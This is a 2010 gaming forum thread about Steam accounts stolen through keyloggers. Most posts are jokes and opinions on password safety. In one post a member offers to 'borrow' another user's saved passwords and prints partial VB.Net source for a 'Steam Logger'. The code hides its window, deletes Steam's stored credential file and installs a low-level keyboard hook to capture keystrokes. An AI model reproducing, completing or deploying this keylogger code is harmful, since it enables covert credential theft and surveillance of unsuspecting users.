Post Reply 
 
Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
The reason for Steam
Author Message
SkyDX
Guardian of the Shining Sky
Team DreamArts

Posts: 2,850.3364
Threads: 305
Joined: 16th Jul 2007
Reputation: 2.15096
E-Pigs: 173.5065
Offline
Post: #11
RE: The reason for Steam
I just posted a funny pic not news about Keylogger >_> <_< Dotdotdot Hihi

[Image: EgGYGSX.png]
TwitterMyAnimeList lastFMBlogdeviantART

Spoiler for Old Rainbow Sounds sig^^:
[Image: 6yWvk.png]
08/08/2010 11:04 AM
Visit this user's website Find all posts by this user Quote this message in a reply
lembas
yuri princess

Posts: 4,365.2931
Threads: 184
Joined: 30th Apr 2008
Reputation: -2.56923
E-Pigs: 154.3525
Offline
Post: #12
RE: The reason for Steam
you would know. xP

Install one on my computer then, haha.

also, good luck getting my passwords, cause I never actually type them. :p

I'm gay.
Spoiler for online game stuff:
[Image: 76561198003967361.png]
[Image: thelemmingbas.png]
3DS FC: 4184-1632-9353
Spoiler:
[Image: wQZsI.jpg]
Spoiler:
In the words of the wise trademark91:
windows Proud
(This post was last modified: 08/08/2010 11:05 AM by lembas.)
08/08/2010 11:05 AM
Visit this user's website Find all posts by this user Quote this message in a reply
Slushba132
BustyLoli-Chan

Posts: 3,125.3993
Threads: 508
Joined: 20th Feb 2008
Reputation: -8.27558
E-Pigs: 73.1299
Offline
Post: #13
RE: The reason for Steam
.........disregarding how "easy" it is to get a keylogger on someone's system

For me personally, I'd have to be dumb enough to download a keylogger. Then dumb enough to run it. And then dumb enough to tell my firewall to let this app connect to the internet, dispite the fact that it probably doesn't need internet access for any reason

And lol.... I like steam :/

08/08/2010 11:53 AM
Visit this user's website Find all posts by this user Quote this message in a reply
joshman99
Able One

Posts: 81.4190
Threads: 6
Joined: 6th Dec 2007
Reputation: 1.46329
E-Pigs: 5.2077
Offline
Post: #14
RE: The reason for Steam
ehh i aint one for getting viruses or whatever, trust me im careful, but this one got through and wasn't detected by antivirus, so yes keylogger my fault, but steam could give me a second chance. (if id cheated id cheat again, so then theyd know if i was telling the truth).

Personally i think its a way to screw people out of money, because im sure they know full well that viruses and other threats get into systems regardless of how careful people are, and accounts will get hacked not due to carelessness. For example, there are viruses that can decompile the clientregistry.blob (the file steam stores your account details in).

Just my say, not that i wanted to start a long line of people explaining how i was stupid enough to let 1 virus into my system..

A Retard Wrote:Hi. Does anyone have an iphone app that will make me a millionaire? Can you pm me it please? Thanks

i can haz favourz please

[Image: 1nf1n1ty484.jpg]
Anime-Planet.com - anime | manga | reviews
08/08/2010 12:04 PM
Find all posts by this user Quote this message in a reply
Assassinator
...

Posts: 6,646.6190
Threads: 176
Joined: 24th Apr 2007
Reputation: 8.53695
E-Pigs: 140.8363
Offline
Post: #15
RE: The reason for Steam
(08/08/2010 12:04 PM)joshman99 Wrote:  ehh i aint one for getting viruses or whatever, trust me im careful, but this one got through and wasn't detected by antivirus, so yes keylogger my fault, but steam could give me a second chance. (if id cheated id cheat again, so then theyd know if i was telling the truth).

Lol, I don't get viruses even when I don't use any anti virus whatsoever (did that for like a year back then).


And considering you probably do (read: should) have a whole set of security software... pretty much...
|
V
Slushba132 Wrote:For me personally, I'd have to be dumb enough to download a keylogger. Then dumb enough to run it. And then dumb enough to tell my firewall to let this app connect to the internet, dispite the fact that it probably doesn't need internet access for any reason

Or... dumb enough to fall prey to a phishing scam.
Or... dumb enough to use a weak password.
(This post was last modified: 08/08/2010 10:19 PM by Assassinator.)
08/08/2010 05:05 PM
Find all posts by this user Quote this message in a reply
Sparker
Super Lame Productions

Posts: 8,165.3369
Threads: 549
Joined: 19th Jan 2007
Reputation: 10.74638
E-Pigs: 187.9012
Offline
Post: #16
RE: The reason for Steam
lol @ pic.

08/08/2010 05:10 PM
Find all posts by this user Quote this message in a reply
Joom
WOOP
Worlds End

Posts: 4,206.7320
Threads: 417
Joined: 20th Mar 2009
Reputation: 5.41709
E-Pigs: 134.1772
Offline
Post: #17
RE: The reason for Steam
(08/08/2010 11:05 AM)lembas Wrote:  you would know. xP

Install one on my computer then, haha.

also, good luck getting my passwords, cause I never actually type them. :p

If you don't type them then they're saved which means I can 'borrow' them much easier. :3 If you don't believe me, try me.

Also, it's a bit harder to 'borrow' Steam passwords these days unless you use a phishing site. I think ever since the new makeover of Steam, it doesn't use the clientregistry.blob file which is where your account info is saved. Granted, I guess it'd depend on what language the logger was coded in.

Spoiler for VB.Net Steam Logger:
Imports System.IO
Public Class Form1
    Dim strin As String = ""
    Dim Steam As New TextBox
    Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
    Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Me.Hide()
        My.Computer.FileSystem.DeleteFile(Environment.SpecialFolder.ProgramFiles & "\Steam\clientregistry.blob")
    End Sub
    Private Function GetActiveWindowTitle() As String
        Dim MyStr As String
        MyStr = New String(Chr(0), 100)
        GetWindowText(GetForegroundWindow, MyStr, 100)
        MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1)
        Return MyStr
    End Function
    Public Class KeyboardHook
        Private Const HC_ACTION As Integer = 0
        Private Const WH_KEYBOARD_LL As Integer = 13
        Private Const WM_KEYDOWN = &H100
        Private Const WM_KEYUP = &H101
        Private Const WM_SYSKEYDOWN = &H104
        Private Const WM_SYSKEYUP = &H105

        Private Structure KBDLLHOOKSTRUCT
            Public vkCode As Integer
            Public scancode As Integer
            Public flags As Integer
            Public time As Integer
            Public dwExtraInfo As Integer
        End Structure

        Private Declare Function SetWindowsHookEx Lib "user32" _
        Alias "SetWindowsHookExA" _
        (ByVal idHook As Integer, _
        ByVal lpfn As KeyboardProcDelegate, _
        ByVal hmod As Integer, _
        ByVal dwThreadId As Integer) As Integer

        Private Declare Function CallNextHookEx Lib "user32" _
        (ByVal hHook As Integer, _
        ByVal nCode As Integer, _
        ByVal wParam As Integer, _
        ByVal lParam As KBDLLHOOKSTRUCT) As Integer

        Private Declare Function UnhookWindowsHookEx Lib "user32" _
        (ByVal hHook As Integer) As Integer


        Private Delegate Function KeyboardProcDelegate _
        (ByVal nCode As Integer, _
        ByVal wParam As Integer, _
        ByRef lParam As KBDLLHOOKSTRUCT) As Integer


        Public Shared Event KeyDown(ByVal Key As Keys)
        Public Shared Event KeyUp(ByVal Key As Keys)

        Private Shared KeyHook As Integer

        Private Shared KeyHookDelegate As KeyboardProcDelegate

        Public Sub New()

            KeyHookDelegate = New KeyboardProcDelegate(AddressOf KeyboardProc)
            KeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyHookDelegate, System.Runtime.InteropServices.Marshal.GetHINSTANCE(System.Reflection.Assembly.GetExecutingAssembly.GetModules()(0)).ToInt32, 0)
        End Sub

        Private Shared Function KeyboardProc(ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KBDLLHOOKSTRUCT) As Integer

            If (nCode = HC_ACTION) Then
                Select Case wParam

                    Case WM_KEYDOWN, WM_SYSKEYDOWN

                        RaiseEvent KeyDown(CType(lParam.vkCode, Keys))
                    Case WM_KEYUP, WM_SYSKEYUP

                        RaiseEvent KeyUp(CType(lParam.vkCode, Keys))
                End Select
            End If

            Return CallNextHookEx(KeyHook, nCode, wParam, lParam)
        End Function
        Protected Overrides Sub Finalize()

            UnhookWindowsHookEx(KeyHook)
            MyBase.Finalize()
        End Sub
Please note that that isn't the full source of the logger.
(This post was last modified: 08/08/2010 10:17 PM by Joom.)
08/08/2010 10:12 PM
Find all posts by this user Quote this message in a reply
feinicks
One day... we Fly...

Posts: 6,124.6050
Threads: 531
Joined: 27th Mar 2008
Reputation: 2.35695
E-Pigs: 210817.3958
Offline
Post: #18
RE: The reason for Steam
Epic!! hahaha

◄◄••• 天使たちの夢か? •••►►

[Image: ewualizer.gif]
My works!
09/08/2010 01:38 AM
Find all posts by this user Quote this message in a reply
Assassinator
...

Posts: 6,646.6190
Threads: 176
Joined: 24th Apr 2007
Reputation: 8.53695
E-Pigs: 140.8363
Offline
Post: #19
RE: The reason for Steam
edit: wait... wtf?

...
(This post was last modified: 14/08/2010 06:36 AM by Assassinator.)
14/08/2010 05:59 AM
Find all posts by this user Quote this message in a reply
Post Reply 


Forum Jump:


User(s) browsing this thread: 1 Guest(s)

 Quick Theme: